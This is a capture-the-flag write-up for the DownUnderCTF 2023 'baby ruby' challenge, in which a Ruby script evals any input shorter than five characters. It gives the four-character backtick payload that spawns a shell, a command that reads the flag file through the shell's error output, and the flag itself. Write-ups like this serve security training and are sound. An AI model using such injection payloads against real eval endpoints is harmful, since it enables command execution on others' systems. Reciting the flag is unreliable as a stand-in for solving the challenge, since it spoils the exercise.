daffainfo
/
ctf-writeup
mirror of https://github.com/daffainfo/ctf-writeup.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
ctf-writeup/2023/DownUnderCTF 2023/baby ruby
History
daffainfo e6c48e50f1 feat: grouped the challs 2024-01-09 16:59:32 +07:00
..
images feat: grouped the challs 2024-01-09 16:59:32 +07:00
README.md feat: grouped the challs 2024-01-09 16:59:32 +07:00

README.md

baby ruby

How well do you know your Ruby?

The flag is at /chal/flag.

About the Challenge

We got a server to connect and also the source code, here is the content of ruby.rb

#!/usr/bin/env ruby

while input = STDIN.gets.chomp do eval input if input.size < 5 end

The length of the payload must < 5 and if the length of our input is under 5 characters, the code will execute our input

How to Solve?

Because there is no filter in the code, we can spawn a shell by inputting

`sh`

And because of we can't use cat command. We can use this command to obtain the flag

sh < /chal/flag

So, when you run sh < /chal/flag, it instructs the sh shell to take the contents of the /chal/flag file and use it as input for shell commands

flag

DUCTF{how_to_pwn_ruby_in_four_easy_steps}